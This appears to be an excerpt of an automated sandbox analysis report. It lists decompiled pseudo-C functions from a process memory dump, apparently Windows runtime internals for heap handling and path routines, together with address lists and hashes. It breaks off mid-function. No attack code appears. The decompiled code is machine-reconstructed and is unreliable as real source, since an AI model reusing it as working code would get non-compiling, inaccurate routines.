Function 053F4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E053F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x54bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E053CCC50(_t86);
					L11:
					return E0540B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x54b8504
				E053E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0540FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0540B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L053E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E053CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x54b8504
								E053DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E053F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x053f4bad
0x053f4bbf
0x053f4bc2
0x053f4bc6
0x053f4bcd
0x053f4bd9
0x054367fe
0x05436800
0x053f4ccc
0x053f4ccd
0x053f4cb7
0x053f4cc9
0x053f4cc9
0x053f4bdf
0x053f4be5
0x00000000
0x00000000
0x053f4beb
0x053f4bef
0x00000000
0x00000000
0x053f4bf5
0x053f4bf9
0x053f4c06
0x053f4c0b
0x053f4c17
0x053f4c1c
0x053f4c1f
0x053f4c25
0x053f4c33
0x053f4c3d
0x053f4c40
0x053f4c43
0x053f4c47
0x053f4c4d
0x053f4c53
0x053f4c54
0x053f4c55
0x053f4c56
0x053f4c5b
0x053f4c5c
0x053f4c63
0x053f4c6b
0x00000000
0x00000000
0x05436776
0x05436784
0x05436784
0x0543679f
0x054367a7
0x054367af
0x054367ce
0x00000000
0x054367b1
0x054367b7
0x054367b8
0x054367c1
0x054367d3
0x054367d9
0x054367dd
0x053f4c94
0x053f4c94
0x053f4c98
0x053f4c9c
0x053f4ca3
0x054367f4
0x054367f4
0x053f4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x053f4cb5
0x053f4c79
0x053f4c7e
0x053f4c89
0x053f4c8b
0x053f4c8f
0x053f4c8f
0x00000000
0x053f4c89
0x054367c3
0x00000000
0x054367c3
0x054367af
0x053f4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70a11e7998f3b344b7a74ec8748d1a74eb114670c592b4bc5a1eda3afca65aa
Instruction ID: 846002d74fa426461d9c2e973ccfaa9e2070f9fec05d76f3da47df646c074f9e
Opcode Fuzzy Hash: d70a11e7998f3b344b7a74ec8748d1a74eb114670c592b4bc5a1eda3afca65aa
Instruction Fuzzy Hash: AD41A235A00229ABCF20DF64C945FEA77B9FF49700F4100AAE909AB350DB74DE85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 053D8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E053D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x54bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0540B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E053DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x53a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E053F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E05403C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E053D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x053d8a0a
0x053d8a1c
0x053d8a23
0x053d8a2e
0x053d8a30
0x053d8a36
0x053d8a3c
0x053d8a3e
0x053d8a4a
0x053d8a52
0x053d8a9c
0x053d8aae
0x053d8a58
0x053d8a5e
0x053d8a6a
0x053d8a6f
0x053d8a75
0x053d8a7d
0x053d8a85
0x053d8a86
0x053d8a89
0x053d8a93
0x053d8a99
0x053d8a9b
0x00000000
0x053d8aaf
0x053d8abe
0x053d8ac3
0x053d8acb
0x053d8ad7
0x053d8ae0
0x053d8af1
0x00000000
0x053d8af1
0x053d8acd
0x053d8ad5
0x053d8afb
0x053d8afd
0x053d8aff
0x053d8b07
0x053d8b22
0x053d8b24
0x053d8b2a
0x053d8b2e
0x053d8b3f
0x053d8b78
0x053d8b41
0x053d8b52
0x053d8b54
0x053d8b5c
0x053d8b74
0x053d8b74
0x053d8b5c
0x053d8b3f
0x053d8b5e
0x053d8b61
0x053d8b64
0x053d8b64
0x053d8b6c
0x053d8b6c
0x053d8b11
0x05429cd5
0x05429cd5
0x053d8b17
0x053d8b1a
0x053d8b1a
0x00000000
0x053d8ad5
0x053d8a89

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e6ddd4c7b816910198c53f40605369b2d4e3d33e026fe3263280c39ade81a5
Instruction ID: 1836ca82a7a9a9f8ec4b9d6a9543d6412eb9a36034ad9797ee70b7521c558db5
Opcode Fuzzy Hash: d4e6ddd4c7b816910198c53f40605369b2d4e3d33e026fe3263280c39ade81a5
Instruction Fuzzy Hash: 9F4151B6A0522C9BDB24DF15DC88AB9F7F9FB44300F1045EAD81997241E774AE85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0548AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0548AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0548ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0548AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0548AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0546CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L053E77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E053E7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0548131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0546CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0548aa1f
0x0548aa21
0x0548aa23
0x0548aa2b
0x0548aa30
0x0548aa36
0x0548aa39
0x0548aa42
0x0548aa75
0x0548aa7a
0x0548aa7c
0x0548aa7c
0x0548aa88
0x0548aa8a
0x0548aa8f
0x0548ab02
0x0548ab04
0x0548aa99
0x0548aaa8
0x0548aaaf
0x0548aab3
0x0548aacc
0x0548aad1
0x0548aad6
0x0548aae0
0x0548aaf3
0x0548aaf9
0x0548aafe
0x0548aafe
0x0548aaf3
0x0548aad6
0x0548aab3
0x0548ab07
0x0548ab0a
0x0548ab11
0x0548ab23
0x0548ab13
0x0548ab1c
0x0548ab1c
0x0548ab2b
0x0548ab44
0x0548ab44
0x0548ab51
0x0548ab51
0x0548aa44
0x0548aa47
0x0548aa4c
0x00000000
0x00000000
0x0548aa5a
0x0548aa64
0x0548aa72
0x00000000
0x0548aa66
0x0548aa66
0x0548aa68
0x0548aa6a
0x00000000
0x0548aa6a

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 2c4218ce5e5c9453d7eb034abe6d33fe2d0e8244ce0841d6f12b0b02d948afe3
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: BA31C232B005446BDB15EA6AC849BFFF7ABEF84620F0940ABE905A7391DAB49D01C650

Uniqueness

Uniqueness Score: -1.00%

Function 0548FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0548FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0548FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05490A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E053E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05481608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05492B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0548C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0548DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E053E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0548A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0548fde7
0x0548fde8
0x0548fdec
0x0548fdee
0x0548fdf5
0x0548fdf7
0x0548fdfc
0x0548fe19
0x0548fe22
0x0548fe26
0x0548fec6
0x0548fecd
0x0548fed5
0x0548fee7
0x0548fed7
0x0548fee0
0x0548fee0
0x0548feef
0x0548ff00
0x0548ff02
0x0548ff07
0x0548ff07
0x00000000
0x0548feef
0x0548fe33
0x0548fe55
0x0548fe59
0x0548fe5b
0x0548fe5e
0x0548fe69
0x0548fe6d
0x0548fe6d
0x0548fe69
0x0548fe35
0x0548fe41
0x0548fe41
0x0548fe79
0x0548fe8b
0x0548fe7b
0x0548fe84
0x0548fe84
0x0548fe93
0x00000000
0x0548fea8
0x0548feba
0x00000000
0x0548feba
0x0548fdfe
0x0548fe01
0x0548fe02
0x0548fe08
0x0548ff0c
0x0548ff14
0x0548ff14

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 03f2a06e287c793d00e407289bfe0bc3e7c7f997f775c67af00dbb010009178a
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 1431D3323046847BD722B769C848FBF7BE6EBC5250F18409BE9468B345DB74D845C720

Uniqueness

Uniqueness Score: -1.00%

Function 0548EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0548EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E053E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0548E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E053CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E053DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0548AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0548BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E053E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0547FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E053DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0548A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0548ea55
0x0548ea66
0x0548ea68
0x0548ea6c
0x0548ea6f
0x0548ea72
0x0548ea75
0x0548ea7a
0x0548ea7a
0x0548ea7e
0x0548ea80
0x0548ea85
0x0548ea8b
0x0548eab5
0x0548eabc
0x0548eabf
0x0548eabf
0x0548eaca
0x0548eace
0x0548ead0
0x0548eae4
0x0548eaeb
0x0548eaf0
0x0548eaf5
0x0548eb09
0x0548eb0d
0x0548eb1d
0x0548eb2d
0x0548eb38
0x0548eb3d
0x0548eb41
0x0548eb4a
0x0548eb60
0x0548eb4c
0x0548eb52
0x0548eb59
0x0548eb59
0x0548eb68
0x0548eb71
0x0548eb71
0x0548ea8d
0x0548ea8f
0x0548ea92
0x0548ea97
0x0548ea97
0x0548ea9b
0x0548ea9c
0x0548ea9e
0x0548eaa6
0x0548eaa6
0x0548eb7e

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: a5712158d4fa67f9b62059fc341ed7d7473c1cdcbfd3cf48cbde44f9f6e9da29
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: BA31A172704705ABC719EF25C884AABB7AEFBC4610F04496EF55687740EB30E819CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 054469A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E054469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x54bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L053D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05446BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E05409980() >= 0) {
							E053E2280(_t56, 0x54b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x54b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x54b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E053CB6F0(0x53ac338, 0x53ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E05409520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E054095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E053DFFB0(_t68, _t77, 0x54b8778);
				}
				_pop(_t78);
				return E0540B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x054469b5
0x054469be
0x054469c3
0x054469c9
0x054469cc
0x054469d1
0x054469d3
0x054469de
0x054469e1
0x054469ea
0x054469f6
0x054469fe
0x05446a13
0x05446a14
0x05446a15
0x05446a16
0x05446a1e
0x05446a26
0x05446a31
0x05446a36
0x05446a37
0x05446a40
0x05446a49
0x05446a4a
0x05446a53
0x05446a59
0x05446a5d
0x05446a5e
0x05446a64
0x05446a67
0x05446a6a
0x05446a6d
0x05446a70
0x05446a77
0x05446a7d
0x05446a86
0x05446a89
0x05446a9c
0x05446a9f
0x05446aa2
0x05446aa5
0x05446aaf
0x05446ab1
0x05446ab8
0x05446ab9
0x05446abb
0x05446abe
0x05446ac5
0x05446ac5
0x05446aaf
0x05446a40
0x05446a26
0x054469fe
0x05446ace
0x05446ad0
0x05446ad3
0x05446ad8
0x05446adf
0x05446adf
0x05446ae8
0x05446aef
0x05446aef
0x05446af9
0x05446b06

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0d36e87b35486a4c3dba09034dc4c6f0e64d1af51b00ec2cd67adf6ab1ed73
Instruction ID: 0ca9e98864834328195df132842b89260d4fcce4d0f33e28267fa145d48724c6
Opcode Fuzzy Hash: 6e0d36e87b35486a4c3dba09034dc4c6f0e64d1af51b00ec2cd67adf6ab1ed73
Instruction Fuzzy Hash: D14168B1E40608AFEB14CFA5D841BEEBBF8FF49714F24816AE815A7280DB709905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053C5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E053C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E053C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E054095D0();
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E053DEB70(_t54, 0x54b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E054095D0();
								L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E053DEB70(_t54, 0x54b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0540F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E053DEB70(_t54, 0x54b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E054095D0();
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x053c5220
0x053c5224
0x05420d13
0x05420d16
0x05420d19
0x053c522a
0x053c522a
0x053c522d
0x053c522d
0x053c5231
0x053c5235
0x053c5239
0x05420d5c
0x05420d62
0x00000000
0x00000000
0x05420d6a
0x05420d7b
0x05420d7f
0x05420d81
0x05420d84
0x05420d95
0x05420d95
0x05420d6c
0x05420d71
0x05420d71
0x05420d9a
0x00000000
0x053c524a
0x053c524a
0x053c5250
0x05420d24
0x05420d35
0x05420d39
0x05420d3b
0x05420d3e
0x05420d50
0x05420d50
0x05420d26
0x05420d2b
0x05420d2b
0x00000000
0x05420d55
0x053c5256
0x053c525b
0x053c5265
0x05420da7
0x053c526b
0x053c526e
0x053c5272
0x05420db1
0x05420db4
0x05420dc5
0x05420dc5
0x053c5272
0x053c5278
0x053c527e
0x053c528a
0x053c528c
0x053c528d
0x00000000
0x053c5280
0x053c5282
0x053c5288
0x053c529f
0x053c5292
0x00000000
0x053c5292
0x00000000
0x053c5288
0x053c527e

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ad969d3f3c553112946a17ea62da125f85fac4b19b2642486cb4a11515573e
Instruction ID: 6b4d9b2f1d5b2dd798188804da0d3d2ef867599ee0fca72e75d23e1916f01059
Opcode Fuzzy Hash: 06ad969d3f3c553112946a17ea62da125f85fac4b19b2642486cb4a11515573e
Instruction Fuzzy Hash: C731E732256620ABD725AB14C848FB67BEAFF40760F51466BE45A4B6D1D770FC01C790

Uniqueness

Uniqueness Score: -1.00%

Function 05403D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05403D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E053D7B60(0, _t61, 0x53a11c4);
